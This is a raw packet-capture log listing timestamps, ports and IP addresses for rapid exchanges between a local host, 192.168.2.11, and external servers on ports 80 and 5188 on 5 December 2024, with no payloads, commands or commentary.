Dec 5, 2024 17:32:15.996370077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996377945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996404886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996963978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996977091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997001886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997013092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997025013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997025013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997040033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997051954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997055054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997075081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997093916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997261047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997294903 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997328997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997364044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997376919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997387886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997406006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997416019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997417927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997426033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997430086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997443914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997447968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997468948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997478962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997489929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997499943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997502089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997526884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997539043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997541904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.997550964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.997584105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998456955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998480082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998492002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998506069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998517036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998517036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998528957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998542070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998548985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998553991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998565912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998574972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998580933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998588085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998594046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998606920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998615980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998620033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998632908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998644114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998644114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998656034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.998657942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.998683929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999293089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999305964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999326944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999326944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999339104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999352932 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999355078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999372959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999402046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999531031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999562025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999741077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999752998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999764919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999777079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999787092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999789953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.999802113 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999814034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999826908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999829054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999829054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.999838114 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999849081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999860048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999867916 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.999871969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999883890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999897003 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.999897957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999910116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.999917984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.999917984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.999954939 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000505924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000519991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000613928 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000653028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000665903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000678062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000689030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000700951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000714064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000719070 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000725985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000739098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000745058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000745058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000751972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000766039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000768900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000778913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000791073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000802994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.000834942 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.000834942 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001343966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001391888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001404047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001418114 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001435995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001445055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001445055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001478910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001529932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001545906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001557112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001569033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001580954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001594067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001600981 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001607895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001620054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001629114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001631975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001646042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001650095 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001650095 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.001658916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.001688957 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002430916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002444983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002456903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002485991 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002543926 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002624989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002650023 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002690077 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002760887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002773046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002784014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002795935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002808094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002820969 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:16.002824068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002835035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002854109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002855062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002868891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002868891 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:16.002881050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002888918 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002895117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002907991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002919912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002928019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002928019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.002933979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.002969027 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.003604889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003618002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003629923 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003640890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003650904 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.003655910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003669977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.003670931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.003709078 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.004277945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.004488945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.004564047 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.005368948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.005534887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.005573034 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.015522957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.015758991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.016661882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.016716003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.096386909 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:16.096467018 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:16.096514940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.096528053 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:16.096576929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.096852064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.096894979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.096921921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.097748995 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.098015070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.098120928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.098162889 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.098342896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.098407984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.098457098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.098496914 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.098779917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.098824978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.099021912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.099059105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.099498987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.099673986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.099721909 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.099961042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.099972963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.099999905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.100016117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.100277901 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:16.100287914 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:16.100305080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.100330114 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:16.100369930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.100409985 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.101105928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.101142883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.101231098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.101264954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.101360083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.101377010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.102148056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.102245092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.102323055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.102490902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.102504015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.102539062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.102541924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.102576971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.103437901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.103494883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.103535891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.103565931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.103667974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.103743076 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.104571104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.104613066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.104736090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.104753017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.104767084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.104779959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.104803085 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.105698109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.105743885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.105765104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.105784893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.105880022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.105961084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.106002092 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.106847048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.106892109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.106919050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.106952906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.107034922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.107153893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.107743025 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.108010054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.108100891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.108160973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.108172894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.108201027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.108321905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.108362913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.109330893 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.109379053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.109391928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.109417915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.109455109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.109489918 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.110441923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.110483885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.110483885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.110516071 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.110642910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.110654116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.110682011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.111514091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.111557961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.111577034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.111594915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.111613989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.111628056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.111700058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.112616062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.112711906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.112765074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.112855911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.112871885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.112912893 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.113782883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.113847017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.113858938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.113873005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.113898039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.113940954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.113984108 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.114965916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.115011930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.115021944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.115034103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.115057945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.115143061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.115186930 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.116092920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.116183043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.116195917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.116224051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.116328955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.116379023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.117285013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.117335081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.117374897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.118478060 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.118518114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.118619919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.118652105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.119535923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.119590998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.119925976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.119972944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.120692968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.121359110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.121402979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.121963024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.121999979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.122011900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.122047901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.123085022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.123111010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.123121977 CET	49793	80	192.168.2.11	185.215.113.84
